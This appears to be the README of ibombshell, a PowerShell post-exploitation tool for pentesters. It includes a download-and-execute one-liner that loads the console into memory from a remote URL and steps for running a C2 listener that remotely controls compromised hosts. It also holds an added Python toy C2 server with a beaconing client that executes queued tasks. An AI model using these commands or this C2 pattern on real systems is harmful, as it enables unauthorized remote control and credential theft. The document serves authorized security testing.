ibombshell is a tool written in PowerShell that gives you a prompt at any time with post-exploitation functionality (and, in some cases, exploitation). It is a shell that is downloaded directly into memory and provides access to a large number of pentesting features. These features can themselves be downloaded directly into memory in the form of PowerShell functions. This form of execution is known as everywhere mode.
In addition, ibombshell provides a second execution mode called silently mode, in which the pentester runs an instance of ibombshell (called a warrior) on the compromised machine. The warrior connects to a C2 panel over HTTP, so the pentester can control it remotely and load into its memory whatever functions the engagement needs. This takes place within the post-exploitation phase.
Prerequisites
To run ibombshell everywhere mode, PowerShell 3.0 or higher is required. For operating systems other than Windows, see the PowerShell GitHub - PowerShell for every system!.
To run ibombshell silently mode you need Python 3.6 and some Python libraries. Install them with:
cd ibombshell\ c2/
pip install -r requirements.txt
Note: the ibombshell C2 works with Python 3.x. Make sure the pip you run belongs to that Python version.
Usage
ibombshell has two execution modes:
ibombshell everywhere
To load ibombshell, simply run in PowerShell:
iex (new-object net.webclient).downloadstring('https://raw.githubusercontent.com/ElevenPaths/ibombshell/master/console')
Now you can start the downloaded ibombshell console by running:
console
ibombshell silently mode
This mode allows you to run the ibombshell console and control it remotely from the C2 panel written in Python. To use it, first load the console in PowerShell on the host:
iex (new-object net.webclient).downloadstring('https://raw.githubusercontent.com/ElevenPaths/ibombshell/master/console')
From the ibombshell C2 directory, start the C2:
python3 ibombshell.py
Then load and run the listener the warriors will connect to:
iBombShell> load modules/listener.py
[+] Loading module...
[+] Module loaded!
iBombShell[modules/listener.py]> run
The default listener port is 8080. Finally, launch the console in silently mode on the host to get remote control, pointing it at the listener:
console -Silently -uriConsole http://[ip or domain]:[port]
Note that the warrior talks to the listener over plain HTTP, so the functions and results it exchanges with the C2 travel in cleartext between the two hosts.
ibombshell C2 scheme
The basic operation of the ibombshell control panel follows this scheme:
  warrior                                        ibombshell C2
     |                                                |
     |  newibombshell                                 |
     |----------------------------------------------->|  register warrior
     |                                                |  from its IP
     |  get functions and instructions                |
     |----------------------------------------------->|
     |                                                |
     |  send functions and instructions               |
     |<-----------------------------------------------|
     |  execute                                       |
     |                                                |
     |  results                                       |
     |----------------------------------------------->|
     |                                                |
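The exchange in the scheme above, as an added example that is not ibombshell's own code: a throwaway HTTP C2 on localhost and a polling warrior client that registers, fetches queued tasks, executes them and reports results. The endpoint names (/register, /tasks, /results), the JSON payloads and the warrior identifier are assumptions chosen for this illustration, not ibombshell's real wire format; the "executor" stands in for the PowerShell functions the real warrior would run.

```python
import json
import threading
import urllib.error
import urllib.request
from http.server import BaseHTTPRequestHandler, HTTPServer


class C2State:
    """In-memory state of the toy C2: registered warriors, queued tasks, results."""

    def __init__(self):
        self.warriors = {}   # warrior_id -> source IP seen at registration
        self.tasks = {}      # warrior_id -> pending task strings
        self.results = {}    # warrior_id -> list of (task, output)
        self.lock = threading.Lock()

    def queue(self, warrior_id, task):
        with self.lock:
            self.tasks.setdefault(warrior_id, []).append(task)


def make_handler(state):
    class Handler(BaseHTTPRequestHandler):
        def log_message(self, *args):  # keep the demo quiet
            pass

        def _json(self, code, body):
            data = json.dumps(body).encode()
            self.send_response(code)
            self.send_header("Content-Type", "application/json")
            self.send_header("Content-Length", str(len(data)))
            self.end_headers()
            self.wfile.write(data)

        def do_POST(self):
            n = int(self.headers.get("Content-Length", 0))
            body = json.loads(self.rfile.read(n) or b"{}")
            wid = body.get("id")
            with state.lock:
                if self.path == "/register":
                    # "register from IP": record the peer address, never a self-reported one
                    state.warriors[wid] = self.client_address[0]
                    state.tasks.setdefault(wid, [])
                    state.results.setdefault(wid, [])
                    return self._json(200, {"status": "registered"})
                if wid not in state.warriors:
                    # unregistered warriors get nothing and can report nothing
                    return self._json(403, {"error": "unknown warrior"})
                if self.path == "/tasks":
                    pending, state.tasks[wid] = state.tasks[wid], []
                    return self._json(200, {"tasks": pending})
                if self.path == "/results":
                    state.results[wid].append((body["task"], body["output"]))
                    return self._json(200, {"status": "ok"})
            self._json(404, {"error": "no such endpoint"})

    return Handler


def post_json(base, path, payload):
    """POST a JSON document and parse the JSON reply (raises HTTPError on 4xx/5xx)."""
    req = urllib.request.Request(base + path, data=json.dumps(payload).encode(),
                                 headers={"Content-Type": "application/json"}, method="POST")
    with urllib.request.urlopen(req) as resp:
        return json.loads(resp.read())


def warrior_run(base, wid, executor):
    """One beacon cycle: register, get instructions, execute each one, send results."""
    post_json(base, "/register", {"id": wid})
    tasks = post_json(base, "/tasks", {"id": wid})["tasks"]
    for task in tasks:
        post_json(base, "/results", {"id": wid, "task": task, "output": executor(task)})
    return tasks


def demo():
    state = C2State()
    server = HTTPServer(("127.0.0.1", 0), make_handler(state))  # port 0: any free port
    base = "http://127.0.0.1:%d" % server.server_address[1]
    threading.Thread(target=server.serve_forever, daemon=True).start()
    try:
        state.queue("warrior-1", "whoami")
        state.queue("warrior-1", "hostname")
        # Constructed stand-in for executing a loaded PowerShell function on the host
        fake_host = {"whoami": "lab\\user", "hostname": "LAB-WS01"}
        ran = warrior_run(base, "warrior-1", lambda t: fake_host[t])
        try:  # a warrior that skipped registration is refused
            post_json(base, "/tasks", {"id": "rogue"})
            rogue = "accepted"
        except urllib.error.HTTPError as e:
            rogue = e.code
        return {"ran": ran, "ip": state.warriors["warrior-1"],
                "results": state.results["warrior-1"], "rogue": rogue}
    finally:
        server.shutdown()
        server.server_close()


if __name__ == "__main__":
    print(demo())
```

The server records the registering warrior's IP from the TCP peer address rather than from anything in the request body, and refuses tasks and results for identifiers it has not seen register; both are the checks a real C2 listener needs so that an arbitrary client on the network cannot pull your loaded functions or inject bogus results.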
Docker
We have created a Docker container with everything you need to make it work. Run these commands from the Dockerfile's location:
sudo docker build -t "ibombshell" .
sudo docker run -it ibombshell
Example videos
Some example videos:
iBombShell: PoC Warrior + Bypass UAC + Pass the hash
iBombShell: macOS
ibombshell: Extracting Private SSH Keys on Windows 10
iBombShell: PoC savefunctions